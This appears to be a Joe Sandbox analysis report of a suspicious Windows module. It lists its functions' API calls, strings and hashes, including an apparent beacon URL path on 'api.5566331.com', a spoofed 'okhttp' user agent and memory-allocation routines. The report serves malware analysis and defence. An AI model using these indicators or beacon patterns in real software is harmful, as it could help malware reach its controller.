__time64.LIBCMT ref: 100080A5
htonl.WS2_32(00000017), ref: 1000821E
htonl.WS2_32(?), ref: 10008224
htonl.WS2_32(?), ref: 10008233
htonl.WS2_32(?), ref: 1000823B
_malloc.LIBCMT ref: 10008241

Part of subcall function 100339BC: __FF_MSGBANNER.LIBCMT ref: 100339D3
Part of subcall function 100339BC: __NMSG_WRITE.LIBCMT ref: 100339DA
Part of subcall function 100339BC: RtlAllocateHeap.NTDLL(02E60000,00000000,00000001,00000000,?,00000000,?,10039271,00000000,00000000,00000000,?,?,10037A2F,00000018,1005F658), ref: 100339FF

_memmove.LIBCMT ref: 1000826B
_free.LIBCMT ref: 1000828D

Strings

Send Context:%s,time:%d,rand:%d, xrefs: 10008092

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: htonl$AllocateH_prologHeap__time64_free_malloc_memmove
String ID: Send Context:%s,time:%d,rand:%d
API String ID: 1013815920-2080267509
Opcode ID: 2d6e38e13791e64b350867ec93c7576bf3289652f4b36b5ef4caa61d214e1a40
Instruction ID: 5ef619c4959f7fe7b54a5c6b697cdb2a2ac42440dc1d89eb5a562cbe716d77b1
Opcode Fuzzy Hash: 2d6e38e13791e64b350867ec93c7576bf3289652f4b36b5ef4caa61d214e1a40
Instruction Fuzzy Hash: 09814875D00219EFEF15DFA4C891AEEBBB9FF14350F50406AE40A67142DB30AA85CF60

Function 100032F8 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 340COMMONLIBRARYCODE

Download Yara Rule

APIs

_memmove.LIBCMT ref: 100033BD
_memmove.LIBCMT ref: 100033F4
_memmove.LIBCMT ref: 10003429
_memmove.LIBCMT ref: 100034B1
_memmove.LIBCMT ref: 10003528
_memmove.LIBCMT ref: 1000358E
_memmove.LIBCMT ref: 100035D2
_memmove.LIBCMT ref: 1000360C

Strings

string too long, xrefs: 10003632
invalid string position, xrefs: 1000363C

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: f038b8342a10b2506af5a521b8d4ddfff3de83e14065b04dfc025b1a13fc3b43
Instruction ID: 78209948d3c235d0ccee1f15894afd96e8bb927bde5659be2634817a1c8f91c7
Opcode Fuzzy Hash: f038b8342a10b2506af5a521b8d4ddfff3de83e14065b04dfc025b1a13fc3b43
Instruction Fuzzy Hash: 59D14C71B00605EFDB26CF48D981A8FB7F9EF48681B24C929E941CB705D731EA50CBA1

Function 1000D124 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 253synchronizationsleepCOMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 1000D17C

Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439

_rand.LIBCMT ref: 1000D189

Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E

_sprintf.LIBCMT ref: 1000D2B3
Sleep.KERNEL32(000003E8), ref: 1000D415
ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?), ref: 1000D44D
CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 1000D45B
ReleaseMutex.KERNEL32(?,?,?,?,?,?), ref: 1000D463
CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 1000D46B

Part of subcall function 1000759D: TerminateThread.KERNEL32(?,00000000), ref: 100075D1
Part of subcall function 1000759D: CloseHandle.KERNEL32(?), ref: 100075DD

Strings

/index.php/inface/Heart/getPulgVersion?v=%s&sid=%s, xrefs: 1000D2AD
api.5566331.com, xrefs: 1000D2DD

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: CloseHandle$MutexReleaseTime$FileH_prologSleepSystemTerminateThread__aulldiv__time64_rand_sprintf
String ID: /index.php/inface/Heart/getPulgVersion?v=%s&sid=%s$api.5566331.com
API String ID: 600006260-1514844053
Opcode ID: 5b68e6a36103b2b27225bd21d2eaa3dc02ce05817c22b899ee495d4a2cd0db48
Instruction ID: 3c7cfe678d53cd4cfc3496ea4f5962675d2c477474c38f7e46c86e78bbea2ba5
Opcode Fuzzy Hash: 5b68e6a36103b2b27225bd21d2eaa3dc02ce05817c22b899ee495d4a2cd0db48
Instruction Fuzzy Hash: 61A1BB715047409FE720DF25C885B9EB7F8FF84395F000A2EF596821A6DBB1B684CB62

Function 10032150 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 174networkfileCOMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 100321AB
InternetOpenA.WININET(okhttp/3.10.0,00000000,00000000,00000000,00000000), ref: 100321D1
InternetSetOptionA.WININET(?,00000006,000007D0,00000004), ref: 100321F0
InternetOpenUrlA.WININET(?,?,00000000,00000000,04000000,00000000), ref: 10032209
HttpQueryInfoA.WININET(00000000,00000005,?,?,?), ref: 1003224A
InternetReadFile.WININET(?,00000000,0000000F,00000001), ref: 10032288
InternetCloseHandle.WININET(?), ref: 1003230F
_free.LIBCMT ref: 10032343

Strings

, xrefs: 1003222C
okhttp/3.10.0, xrefs: 100321CC

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Internet$Open$CloseFileHandleHttpInfoOptionQueryRead_free_malloc
String ID: $okhttp/3.10.0
API String ID: 3353598147-1811919558
Opcode ID: e89ea9ecb87e72443c43d04e6883bf0f287679ed8ef464e104359b3e63fe85c2
Instruction ID: 6613a09fe64cb60b8deb12e6b99425ea02e756cb61ab0c2e0afa952f94dfd23c
Opcode Fuzzy Hash: e89ea9ecb87e72443c43d04e6883bf0f287679ed8ef464e104359b3e63fe85c2
Instruction Fuzzy Hash: 22616BB1D04249EFEB11DF94CC84B9EBBB9FF44701F104229F515AB290DB756A04CB50

Function 1001BB50 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120memoryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1001BB55
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,1005ADE8,?,?,msg), ref: 1001BBB9
LocalAlloc.KERNEL32(00000040,?,?,?,00000000,00000000,1005ADE8,?,?,msg), ref: 1001BBCC
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000010,?,?,?,00000000,00000000,1005ADE8,?,?,msg), ref: 1001BBF0
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00000010,?,?,?,00000000), ref: 1001BC01
LocalAlloc.KERNEL32(00000040,00000001,?,?,00000000,00000010,?,?,?,00000000,00000000,1005ADE8,?,?,msg), ref: 1001BC10
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000010,00000000,00000000,?,?,00000000,00000010,?,?,?,00000000), ref: 1001BC29
LocalFree.KERNEL32(00000000,?,?,00000000,00000010,?,?,?,00000000,00000000,1005ADE8,?,?,msg), ref: 1001BC47
LocalFree.KERNEL32(00000000,?,?,00000000,00000010,?,?,?,00000000,00000000,1005ADE8,?,?,msg), ref: 1001BC4E

Strings

msg, xrefs: 1001BB5D

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: ByteCharLocalMultiWide$AllocFree$H_prolog
String ID: msg
API String ID: 3740934621-1753898927
Opcode ID: bfc50e741bcaa8f8df6f650e6224fc60f4eb70a8fe3099340c31f495e8fb8e41
Instruction ID: 3417434ddd44f1a49827b806d4fd3252603f52a92ad1e8b90fd295c3e2c89ed9
Opcode Fuzzy Hash: bfc50e741bcaa8f8df6f650e6224fc60f4eb70a8fe3099340c31f495e8fb8e41
Instruction Fuzzy Hash: 0A317AB5604606BFFB14DBA4CCE5EBFB7BDEF84650F100519F5019A690DBB0AD40CAA1

Function 10016F59 Relevance: 16.8, APIs: 11, Instructions: 253networkCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10016F5E

Part of subcall function 10017439: GetLocalTime.KERNEL32(?,?,?,?,?,10016F76,?,?), ref: 10017445
Part of subcall function 10017439: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,10016F76,?,?), ref: 10017453
Part of subcall function 10017439: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10017466
Part of subcall function 10017439: GetTickCount.KERNEL32 ref: 10017478

WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000064,00000000,?,?,?,?,?), ref: 10016FDC
WSAEnumNetworkEvents.WS2_32(?,?,?), ref: 10016FF9
recvfrom.WS2_32(?,00000000,00000400,00000000,?,?), ref: 10017034
htons.WS2_32(?), ref: 10017052
htons.WS2_32(?), ref: 10017070
htons.WS2_32(?), ref: 10017082
htons.WS2_32(00000000), ref: 10017150
htons.WS2_32(?), ref: 10017161
htonl.WS2_32(?), ref: 1001716A
htons.WS2_32(?), ref: 10017175

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: htons$Time$Events$CountEnumFileH_prologLocalMultipleNetworkSystemTickUnothrow_t@std@@@Wait__ehfuncinfo$??2@htonlrecvfrom
String ID:
API String ID: 3657242895-0
Opcode ID: 9f328af12706df1049d1de58173ec4bc6a977d55ca6c10be68cdefb092af4e46
Instruction ID: 64033cd76504c99bd8c02ece87d976712559a0c07fba20b8b255469a797a9f68
Opcode Fuzzy Hash: 9f328af12706df1049d1de58173ec4bc6a977d55ca6c10be68cdefb092af4e46
Instruction Fuzzy Hash: E4A14C7590021AABDB11DFA4CC85BAEB7F9FF08344F108169F959EB181D734EA85CB60

Function 1001B144 Relevance: 16.7, APIs: 11, Instructions: 219memoryCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(000000C1,?,000001C8,?,?,?,?,?,?,?,?,?,?,?,?,10010BB2), ref: 1001B15F

Part of subcall function 1001AC3E: SetLastError.KERNEL32(0000000D,1001B18D,?,000001C8), ref: 1001AC44

SetLastError.KERNEL32(000000C1,?,?,000001C8), ref: 1001B1A4
GetNativeSystemInfo.KERNEL32(?,?,?,000001C8), ref: 1001B1F0
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,000001C8), ref: 1001B225
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,000001C8), ref: 1001B23B
GetProcessHeap.KERNEL32(00000008,00000040,?,000001C8), ref: 1001B251
HeapAlloc.KERNEL32(00000000,?,000001C8,?,?,?,?,?,?,?,?,?,?,?,?,10010BB2), ref: 1001B258
VirtualFree.KERNEL32(00000000,00000000,00008000,?,000001C8), ref: 1001B26B
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,000001C8), ref: 1001B2CE
_memmove.LIBCMT ref: 1001B2DD
SetLastError.KERNEL32(0000045A,?,?,?,?,000001C8), ref: 1001B395

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: AllocErrorLastVirtual$Heap$FreeInfoNativeProcessSystem_memmove
String ID:
API String ID: 321963714-0
Opcode ID: 361e14a444157680da24d7be41ad6f6d56bc42084d3da2e7e07463f5a3e415a7
Instruction ID: 847e78ca93ded4939880e2626f7d24c040fa23cbcd70bd529c665b21de598f23
Opcode Fuzzy Hash: 361e14a444157680da24d7be41ad6f6d56bc42084d3da2e7e07463f5a3e415a7
Instruction Fuzzy Hash: E981AB71A00A12ABEB01CF64CD91B6EB7F5FF44384F564058E901DF681E7B4EA91CB90

Function 10019D89 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 55COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10019D8E
std::_Lockit::_Lockit.LIBCPMT ref: 10019D9D

Part of subcall function 10032521: __lock.LIBCMT ref: 10032532

int.LIBCPMT ref: 10019DB4

Part of subcall function 1001761A: std::_Lockit::_Lockit.LIBCPMT ref: 1001762B

std::locale::_Getfacet.LIBCPMT ref: 10019DBD
std::bad_exception::bad_exception.LIBCMT ref: 10019DEB
__CxxThrowException@8.LIBCMT ref: 10019DF9
std::_Facet_Register.LIBCPMT ref: 10019E0F

Strings

bad cast, xrefs: 10019DE3
inc\http\HttpConnection.cpp, xrefs: 10019D97

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: std::_$LockitLockit::_$Exception@8Facet_GetfacetH_prologRegisterThrow__lockstd::bad_exception::bad_exceptionstd::locale::_
String ID: bad cast$inc\http\HttpConnection.cpp
API String ID: 2094517415-878910050
Opcode ID: 33f0602c4098acafb2d6dec171571f8ad03e078d669f5d5aace8de008006760f
Instruction ID: ff162fffaf9d315a833b4e117f5f7f71c2c72c274f303676d478dc7ea6359ac4
Opcode Fuzzy Hash: 33f0602c4098acafb2d6dec171571f8ad03e078d669f5d5aace8de008006760f
Instruction Fuzzy Hash: E811E1369005259BCB06DBA8CC95AEE77B8FF44261F10041AF411BB291DF74EE45CB90

Function 10043C53 Relevance: 15.2, APIs: 10, Instructions: 219COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 10043C61

Part of subcall function 10037966: __mtinitlocknum.LIBCMT ref: 10037978
Part of subcall function 10037966: __amsg_exit.LIBCMT ref: 10037984
Part of subcall function 10037966: EnterCriticalSection.KERNEL32(00000000,?,100417BE,0000000D,1005F8C8,00000008,10041750,00000000,00000000,?,?,100092B7,?,?,?,1000A450), ref: 10037991

__calloc_crt.LIBCMT ref: 10043C72

Part of subcall function 10039211: __calloc_impl.LIBCMT ref: 10039220
Part of subcall function 10039211: Sleep.KERNEL32(00000000), ref: 10039237

@_EH4_CallFilterFunc@8.LIBCMT ref: 10043C8D
GetStartupInfoW.KERNEL32(?,1005F990,00000064,10036606), ref: 10043CE6
__calloc_crt.LIBCMT ref: 10043D31
GetFileType.KERNEL32(00000001), ref: 10043D78
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 10043DB1

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__amsg_exit__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 2673217650-0
Opcode ID: bf8130ea20704dc4245055050c5bc798ba91e30348419140fc47d35c94ca2794
Instruction ID: f4e5f61177d5235ce0b8ddcc98d3a42e21ff5188ee89bcb52046ecf7715843de
Opcode Fuzzy Hash: bf8130ea20704dc4245055050c5bc798ba91e30348419140fc47d35c94ca2794
Instruction Fuzzy Hash: F881CDB19056569FDB10CF69C88059EBBF0EF09320B34A26DD4A6EB3D1D734D802CB58

Function 10011030 Relevance: 15.2, APIs: 10, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10011035

Part of subcall function 10010E45: __EH_prolog.LIBCMT ref: 10010E4A

htonl.WS2_32(?), ref: 10011095
htonl.WS2_32(?), ref: 1001109D
__time64.LIBCMT ref: 100110A3

Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439

htonl.WS2_32(00000000), ref: 100110AC

Part of subcall function 1001BD49: __EH_prolog.LIBCMT ref: 1001BD4E
Part of subcall function 1001BD49: _sprintf.LIBCMT ref: 1001BDBB

Part of subcall function 10003925: _memmove.LIBCMT ref: 10003950

Part of subcall function 100036AE: _memmove.LIBCMT ref: 10003704

Part of subcall function 1001BF99: __EH_prolog.LIBCMT ref: 1001BF9E

htonl.WS2_32(-0000001C), ref: 100111BD
htonl.WS2_32(00000000), ref: 100111C5
_malloc.LIBCMT ref: 100111CB

Part of subcall function 100339BC: __FF_MSGBANNER.LIBCMT ref: 100339D3
Part of subcall function 100339BC: __NMSG_WRITE.LIBCMT ref: 100339DA
Part of subcall function 100339BC: RtlAllocateHeap.NTDLL(02E60000,00000000,00000001,00000000,?,00000000,?,10039271,00000000,00000000,00000000,?,?,10037A2F,00000018,1005F658), ref: 100339FF

_memmove.LIBCMT ref: 100111F5

Part of subcall function 1001127B: __EH_prolog.LIBCMT ref: 10011280

_free.LIBCMT ref: 1001120F

Part of subcall function 10033984: RtlFreeHeap.NTDLL(00000000,00000000,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 10033998
Part of subcall function 10033984: GetLastError.KERNEL32(?,?,10008C33,?,?,100092B7,?,?,?,1000A450,?,?,?,?,?), ref: 100339AA

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prologhtonl$_memmove$HeapTime$AllocateErrorFileFreeLastSystem__aulldiv__time64_free_malloc_sprintf
String ID:
API String ID: 3199956779-0
Opcode ID: f1def56a13bd0e5f7ff018ac0f083bd741eaff235069b981e355ef1a534298ac
Instruction ID: 835a1f08fa8a8af1b86e20a3026624fe9f93954c30b8a38d983207ef737a5809
Opcode Fuzzy Hash: f1def56a13bd0e5f7ff018ac0f083bd741eaff235069b981e355ef1a534298ac
Instruction Fuzzy Hash: 63616D75D00258EFDF15DFA4D891AEEBBB8EF54300F10845AF419A7282DB34AA49CF51

Function 100151F7 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 222COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 100151FC
GetTempPathA.KERNEL32(00000104,?,1005D0F4,?,1005D0F4,00000000,1005AF8C,?,1005AF8C,00000000,c:\,?,000001C8,?), ref: 100152A2
GetModuleHandleA.KERNEL32(00000000,1005D0FC,?,1005D0FC,00000000,?,000001C8,?), ref: 1001530A
GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,000001C8,?), ref: 1001531D
_strrchr.LIBCMT ref: 1001532C

Part of subcall function 1001C0C6: __time64.LIBCMT ref: 1001C0CD
Part of subcall function 1001C0C6: _rand.LIBCMT ref: 1001C0DF
Part of subcall function 1001C0C6: _rand.LIBCMT ref: 1001C0F0

Part of subcall function 10003256: _memmove.LIBCMT ref: 100032C6

Part of subcall function 10009155: _memcmp.LIBCMT ref: 10009180

Part of subcall function 1001C0C6: _rand.LIBCMT ref: 1001C100

Strings

Windows\, xrefs: 10015244, 10015249, 10015251
c:\, xrefs: 10015217
Windows\System32\, xrefs: 10015404, 10015409, 10015411

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _rand$Module$FileH_prologHandleNamePathTemp__time64_memcmp_memmove_strrchr
String ID: Windows\$Windows\System32\$c:\
API String ID: 2592937688-2965336455
Opcode ID: 908297eadbe533f2f50bf3ae75fab14de167238dfd56605b7d6aa7874a5bc9b6
Instruction ID: 20a427f31c4f15e36cfe53c2b189bc403b5a0b5ac72e4174fe82cc10685258e7
Opcode Fuzzy Hash: 908297eadbe533f2f50bf3ae75fab14de167238dfd56605b7d6aa7874a5bc9b6
Instruction Fuzzy Hash: 5C51D17650010ABAEB15EB60DC5AEFF336EDF84290F10411AF6159B096EF74EE898620

Function 10019CE5 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 10019CEA
std::_Lockit::_Lockit.LIBCPMT ref: 10019CF9

Part of subcall function 10032521: __lock.LIBCMT ref: 10032532

int.LIBCPMT ref: 10019D10

Part of subcall function 1001761A: std::_Lockit::_Lockit.LIBCPMT ref: 1001762B

std::locale::_Getfacet.LIBCPMT ref: 10019D19
std::bad_exception::bad_exception.LIBCMT ref: 10019D47
__CxxThrowException@8.LIBCMT ref: 10019D55
std::_Facet_Register.LIBCPMT ref: 10019D6B

Strings

bad cast, xrefs: 10019D3F

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
